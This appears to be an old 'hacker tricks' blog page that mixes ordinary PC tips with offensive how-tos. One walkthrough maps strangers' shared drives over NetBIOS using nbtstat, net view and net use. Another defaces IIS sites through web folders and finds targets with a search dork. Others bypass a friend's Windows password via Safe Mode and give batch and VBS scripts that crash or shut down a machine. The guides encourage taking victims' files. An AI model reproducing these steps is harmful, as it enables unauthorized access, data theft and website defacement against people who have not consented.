100% Free Free Free Download No Hide Charges No Sign up No virus Daily Update Blogger Templates
Showing posts with label Computer Tricks. Show all posts
Showing posts with label Computer Tricks. Show all posts

Friday, January 31, 2014

Clear all the remote desktop session remotely

No comments:

Clear all the remote desktop session remotely

mstsc /v: /f -admin      (Copy and paste into run)

Open RUN

Replace IP ( from your IP

Then ENTER  

Do Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in Daily Update

Read More!

Saturday, January 18, 2014

Alternative Blocked

No comments:

Best Alternative If Command Prompt Is Blocked



Most of the computers that have public access to people has Command Prompt blocked. This is for security reasons. Some time you  may want to view hidden files in the public computer using command prompt (in case Folder options settings is not available). Lack of Command Prompt will be great loss of if you want to hack in to the networking or the same pc.
There are several tweaks and hacks to enable command prompt, but it is so much tricky. I am introducing you with a nice alternative forcommand prompt.
Have a look at the screenshot. It supports all the features that Command Prompt does. Even all the wild cards that can be used in DOS(Disk Operating System).

Download it from here:
It is actually a DOS Shell, which interpets user command same as in DOS.

Do Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in Daily Update
Read More!

Friday, October 26, 2012

Top 5 Ways to Boost Up Your PC Speed

No comments:
It is so embarrassing when processing speed of personal computer is too slow. Mind starts to blow up and wish to give a hard punch to the CPU/Monitor, but not able to do so. Whenever we have any important work on computer and the processing speed hangs; we feel so irritating and choose to go for Internet Cafe in locality. But how long we manage this?
Speed Up Your PC
So, I have rendered 5 Best Solutions for boosting up PC processing speed mentioned below.

Best 5 ways to Boost Up PC Speed:

1. Delete Temporary Files

Windows contains an inbuilt application to store Temporary Files in respective folders whenever we use PC. We can see these Temporary files and folders through this application and have to delete them time to time.
You can clean those temporary files by,
  • Opening the Run window
  • Then entering this ‘%temp%’ ( i.e. Run  >> %temp% )
  • When the folder opens, just select ctrl+A and delete all files and folders
Delete Temporary Files
NOTE: Some files/folders are unable to delete as they may be opened currently, so don’t worry leave them.

2. Disk Cleanup

We know that whenever any Memory Card’s have short memory left, the speed of mobile functionality decreases. Same as in case of Personal Computers. When primary and secondary memory experiences shortage of memory we need to delete the junk/unwanted files and folders. Every window provides utility named Disk Cleanup to remove such type of junk files and folders.
You can use this utility from,
  • Start >> All Programs >> Accessories >> System tools >> Disk cleanup
  • Finally click the Disk Cleanup button and you are done
Disk Cleanup Tutorial

3. Hard Disk Defragmentation

Hard Disk of computers have to perform some Extra Work called fragmentation. This usually slow down the processing speed. Defragmentation is a process which arranges the files in such a way to that they can be fetched speedily during Fragmentation. Data reading becomes faster from this.
You can use this utility from,
  • Start >> All Programs >> Accessories >> System Tools >> Disk Defragmenter
  • After following the above steps, click Defragment Now in the Tools tab and you are done
Hard Disk Defragmentation

4. Disable Unnecessary System Startup Applications

When we start our computer, it starts a bunch of processes running in background which we don’t need really. This slows down the system performance. So, we must to stop these processes to speed up the system processing which is almost 20%.
You can disable these unnecessary processes from,
  • Start >> Run >> type ‘msconfig’ and enter
  • Now, go to StartUp tab and disable/uncheck the unnecessary processes and
  • Finally hit OK and you are done
Disable Unnecessary Startups

5. CCleaner Software

Some users found the above solutions really confusing and tricky and not able to do such solutions. The best solution for them is to download a software named ‘CCleaner’ and install it in the particular system. Then, open it and click on analyse button. The analyser show you the approximate space to be clean up from your system which contains unwanted files and folders, cookies, cache memory of web browser etc. Then, simply hit the Run Cleaner and you are done.
CCleaner Software
These are some simple solutions to speed up your Personal Computers. Hope you find these solutions helpful and they worked successfully in your systems. If you are facing any type of problem, then simply put your problem in our COMMENT BOX. I will give you the perfect solution for that as soon as possible.
Do Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in Daily Update
Read More!

How to Hack a Password Protected Computer Account + Prank

(For Windows) Do you want to pull a computer prank on a friend but their account is password protected? Fear not because this easy step-by-step how-to guide will help you hack into their personal account and give you the choice to either remove the password or change it. That combined with another prank may make your friend frustrated and confused, but will hopefully leave them laughing along with you afterwards.

Restart your computer and once it restarts, keep pressing F8 on your keyboard until your computer screen shows a list of options to boot your computer.2
  1. 2
    Scroll up using the up key on your keyboard to “Safe Mode,” which should be the first option on the list.
  2. 3
    After a few moments, the start-up menu will appear and there will be a new account labeled “Administrator.”
  3. 4
    Click on “Administrator” and once the computer logs onto the account, press “Start Menu.”
  4. 5
    Open “Control Panel” and click on “User Accounts.”
  5. 6
    Click “User Accounts” again and now click on your friend’s account from the list of given accounts.
  6. 7
    You can change the password of your friend’s account by clicking on “Change the Password” and then entering a new password or you can remove the password by selecting, “Remove the Password.”
  7. 8
    Restart your computer again and this time let it load to the start-up menu. Click on your friend’s account and now it’s time for the prank!


  1. 1
    The first step of this prank is to clear all your icons (or the ones you want) from your desktop. To do so, create a new folder and label it whatever you like.
  2. 2
    Now press “Prt Scr” on your keyboard to take a picture of your desktop.
  3. 3
    Open “Paint” (located in “Accessories”) and paste the picture. Save the file.
  4. 4
    Go back to your desktop and drag the icons into the folder you created in step 1.
  5. 5
    Now right click on your desktop and go to “Properties.” Go to “Desktop” and browse for the file you created. Once you have found it, select “Ok.”
  6. 6
    And last but not least, right click on the taskbar and go to “Properties”. Then the second box which says "Auto-hide the taskbar"
  7. 7
    Congratulations! Now all you have to do is sit back and enjoy the look on your friend’s face when he/she tries to figure out what’s going on.
Do Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in Daily Update
Read More!

Tuesday, October 23, 2012

How to Clear your tracks on PC & System

No comments:

Your computer is tracking all your actions and stores the evidence into your hard disk. Anyone else can see where you have been on Internet and the images, movies you have seen, even everything you did on your computer would leave traces on your computer, Perhaps you stumbled onto one or two adult Web sites. Perhaps by accident. Perhaps on purpose. And you don't want your husband/wife, dad/mom, boss/colleague or anyone else to know you've been there.

You can clear your history or empty your cache file in your browser's settings, but it will not protect you, some files can not be Erase.

Now its simple Single Click Complete Erasing! With only one click, Internet
History Eraser can clean up every trace of your Internet activity! Just
Choose what you want to erase, then click the Erase, and Internet History
Eraser will automatically remove all traces of your internet history!

CRACKDo Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in
Read More!

IIS EXPLOIT [For Xp And Win7]

No comments:
Steps for Xp-
# open run
# type-
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
and press enter !
#A new window name "WEB FOLDER" gets open
#Right click and click on New, Add Web Folder then enter your vulnerable website address.
#then next….finish
# now You can insert your page with name index.html by simply copy pasting.
Also after getting access to the website…Many websites don’t allows you to
add your page. so leave them.
#Dork- "Powered by IIS" or use your own unique dork.
Windows 7-
#Click Start.
#Click Computer.
# In the following dialog click Map Network Drive.
# On the Map Network Drive dialog, click "Connect to a Web site that you can use to store your documents and Pictures" this will pop up the "Welcome to the Add Network Location Wizard".
# Click on Next.
# Click on ”Choose a custom network location”.
# Click on Next.
# Now type the web folder address that you want to access.
# Enter a NAME to help you identify the web folder and click Next.
# Place a checkmark on ‘Open this network location when I click finish’.
# Click Finish.
and insert your deface page !!
Do Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in
Read More!

Download Hacking Exposed Computer Forensics,2nd Edition

No comments:

Hacking Exposed Computer Forensics,2nd Edition

"Provides the right mix of practical how-to knowledge in a straightforward, informative fashion that ties it all the complex pieces together with real-world case studies. ...Delivers the most valuable insight on the market. The authors cut to the chase of what people must understand to effectively perform computer forensic investigations." --Brian H. Karney, COO, AccessData Corporation

The latest strategies for investigating cyber-crime

Identify and investigate computer criminals of all stripes with help from this fully updated. real-world resource. Hacking Exposed Computer Forensics, Second Edition explains how to construct a high-tech forensic lab, collect prosecutable evidence, discover e-mail and system file clues, track wireless activity, and recover obscured documents. Learn how to re-create an attacker's footsteps, communicate with council, prepare court-ready reports, and work through legal and organizational challenges. Case studies straight from today's headlines cover IP theft, mortgage fraud, employee misconduct, securities fraud, embezzlement, organized crime, and consumer fraud cases.

*Effectively uncover, capture, and prepare evidence for investigation
* Store and process collected data in a highly secure digital forensic lab
* Restore deleted documents, partitions, user activities, and file systems
* Analyze evidence gathered from Windows, Linux, and Macintosh systems
* Use the latest Web and client-based e-mail tools to extract relevant artifacts
* Overcome the hacker's anti-forensic, encryption, and obscurity techniques
* Unlock clues stored in cell phones, PDAs, and Windows Mobile devices
*Prepare legal documents that will hold up to judicial and defense scrutiny

About the Author

Aaron Philipp is a managing consultant in the Disputes and Investigations practice at Navigant Consulting, which assists domestic and global corporations and their counsel who face complex and risky legal challenges.

David Cowen, CISSP, is a partner at G-C Partners, LLC, where he provides expert witness services and consulting to Fortune 500 companies nationwide.

Chris Davis, CISA, CISSP, is an information security and computer forensics author, trainer, and presenter.

* Paperback: 544 pages
* Publisher: McGraw-Hill Osborne Media; 2 edition (September 10, 2009)
* Language: English
* ISBN-10: 0071626778
* ISBN-13: 978-0071626774

Do Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in
Read More!

Hacking into computers {NetBIOS Hacking with pictures}

No comments:

NetBIOS Hacking
-What is it?-
Net BIOS Hacking is the art of hacking into someone else’s computer through your computer. Net BIOS stands for “Network Basic Input Output System.” It is a way for a LAN or WAN to share folders, files, drives, and printers.

-How can this be of use to me?-
Most people don’t even know, but when they’re on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.

-What do I need?-
Windows OS
Cain and Abel (http://www.oxid.it/)
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
-[Step 1, Finding the target.]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross

Another window will pop up, make sure “All host in my subnet” is selected, and then click ok.

It should begin to scan

Then IP’s, computer names, and mac addresses will show up.
Now remember the IP address of the computer you are going to be breaking into.
If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok.
During the next step we will begin our trial and error.

++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
-[Part 2, Trial and Error]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++

Now, we don’t know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the command prompt.
I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt.
I am only doing this to avoid confusion.
Let’s get back to the hacking.
Type in “ping (IP address of the target).” For example in this tutorial, “ping”
This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private information):

If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.

++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
-[Part 3, Gathering the Information.]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++

Now, input this command “nbtstat –a (IP address of target).” An example would be “nbtstat –a”

This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.

Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.

The information right below the original command says: “Local Area Connection,” this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.

The information right below the “Local Area Connection,” is “Wireless Network Connection 2:” It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into.

The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup

++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
-[Step 4, Breaking In]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++

Finally it’s time.
By now we know: that our target is online, our target has file sharing, and our target’s computer name.
So it’s time to break in.
We will now locate the shared drives, folders, files, or printers. Type in “net view \\(IP Address of Target)”
An example for this tutorial would be: “net view \\”

We have our just found our share name. In this case, under the share name is “C,” meaning that the only shared thing on the computer is C. Then to the right, under Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person’s hard drive.

All's that is left to do is “map” the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in “net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, “net use K: \\\C.” Ok, let’s say that you plan on doing this again to a different person, do u see the “K after “net use?” This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be “net use G...,” for a different

As you can see, for my hack I have already used “K,” so I used “G” instead.
You may also do the same for multiple hacks.
If it worked, it will say “The command completed successfully.”
If not, you will have to go retrace you steps.
Now open up “my computer” under the start menu, and your newly created network drive should be there.

Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won’t be able to access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.
If you are just doing this to hack something, then go explore it and have some well deserved fun!

Congratulations! You’re DONE!

-Commands used in this tutorial:
NBTSTAT -a (IP Address of Target)
NET VIEW \\(IP Address of Target)
NET USE K: \\(IP Address of Target)\(SHARENAME)

Do Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in
Read More!

This Is A Cool Multi Tool Application Made By Viprex28

No comments:

[Image: fylmok.jpg]
Virus Scan:
File Information
Report Generated: 1.12.2009 at 20.12.45 (GMT 1)
Time for scan: 87 seconds
File Name: underworldv1.0codedbyviperx28.rar
File Size: 72759
MD5 Hash: e5e5b5af0fa2ce2adf5583851117fabf
SHA1 Hash: 325BE4735FA18C92A591CCD7693BDC64D3C3C930
Detection Rate: 0 on 24 (0%)
Status: CLEAN
Antivirus Sig version Engine Version Result
a-squared 01/12/2009 -
Avira AntiVir -
Avast 091130-1 4.8.1229 -
AVG 270.14.88/2537 -
BitDefender 01/12/2009 -
ClamAV 01/12/2009 0.95.1 -
Comodo 3083 3.13.573 -
Dr.Web 01/12/2009 5.0 -
Ewido 01/12/2009 -
F-PROT6 20091130 -
G-Data 19.9115 2.0.7309.847 -
Ikarus T3 01/12/2009 1001074 -
Kaspersky 01/12/2009 -
McAfee 30/11/2009 -
NOD32 v3 4651 3.0.677 -
Norman 2009/11/03 5.92.08 -
Panda 20/10/2009 -
QuickHeal 01/12/2009 10.0 -
Solo Antivirus 01/12/2009 8.0 -
Sophos 01/12/2009 4.32.0 -
TrendMicro 661(666100) 1.1-1001 -
VBA32 01/12/2009 -
VirusBuster 10.114.5 1.4.3 -
ZonerAntivirus 01/12/2009 0.2.0 -
Extra Information
CRC32: 337179258
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
PDF Exploit Scan: Nothing found
HTML Exploit Scan: Nothing found

your MSN Version Must Be Patched for the MSN Nudge Bomber works

Download Link For The Application:http://www.mediafire.com/download.php?ijz4vdx2lnh
Do Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in
Read More!

Monday, October 22, 2012

Notepad Hacks

1 comment:
Hey Friends today I am going to share few New Notepad hacks. They are really cool and crazy one's. So Please think atleast three to four times to use them on your PC.

This will pop up endless notepads until the computer freezes and crashes. Copy the below code in notepad and save it as ".vbs" extension.

@ECHO off
START %SystemRoot%\system32\notepad.exe
GOTO top

This constantly turns caps lock on and off really fast continuously.

Set wshShell =wscript.CreateObject(”WScript.Shell”)
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”

This makes it so the backspace key is constantly being pressed.

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
wscript.sleep 100
wshshell.sendkeys “{bs}”

Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "You are a fool."

Convey your friend a message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" in All Files .Do Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in
Read More!

Saturday, October 6, 2012

Very Risky DOS Hacking Cmd Codes

Get an ip scanner like ANGRY IP SCANNER
Scan the Victims ip. Otherwise Get him using netstat command.

Open a dos prompt by going to start/run
type "cmd" in the run box.Press OK.

this is what u will see:
C:\Documents and Settings\>

c:windows>nbtstat -a

U will see:

NetBIOS Remote Machine Name Table

Name Type Status
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx

If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find a another victim.

Step 3

type :
c:windows>net view
The Output will be:

Shared resources at

Sharename Type Used as Comment

CDISK Disk xxxxx xxxxx

The work is done.

"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4

type down:
replace x: by anything letter you want but not your own drive 
letters.(Not compulsory)
CDISK is the name of the shared hard-drive.

c:windows>net use x:

If the command is successful we will get the confirmation.
The command was completed successfullly

Now open windows explorer or just double click on the My Computer icon 
on your
desktop and you will see a new network drive X:> .
Now your are in his system.
Check out guyz....
Do dis AT your own Risk.....
Read More!

Thursday, October 4, 2012

Amazing 3D Windows desktop Using BUMP TOP

No comments:

If you're tired of your Windows desktop and changing the wallpaper doesn't work anymore, try going for the third dimension!
BumpTop is an alternative three-dimensional desktop that lets you manage icons and files in a totally 3D environment that also follows basic physics rules. In this sense, files behave like real-life objects, which you can throw against windows, hang from walls and pile up in stacks according to different criteria.
BumpTop's appearance is simply spectacular. The 3D design is like nothing you'veseen so far in desktop management. Managing files and folders like objects is fun. What's more, you can decorate the desktop with post-it notes, photos and also different themes.
That said, the truth is that BumpTop is more beautiful than practical. Despite having some nice usability tricks, like being able to print a document just by dragging and dropping it on the printer's icon, I don't think a 3D environment is the most useful way to manage your desktop – not to mention the app's high system requirements.

*. Very intuitive
*. Impressive design
*. Customizable appearance
*. Icons behave like real-lifeobjects

*. High system requirements
*. Beautiful, but not that useful after all

CLICK HERE TO DOWNLOAD BUMP TOPhttps://hackersunrise.blogsopt.in
Read More!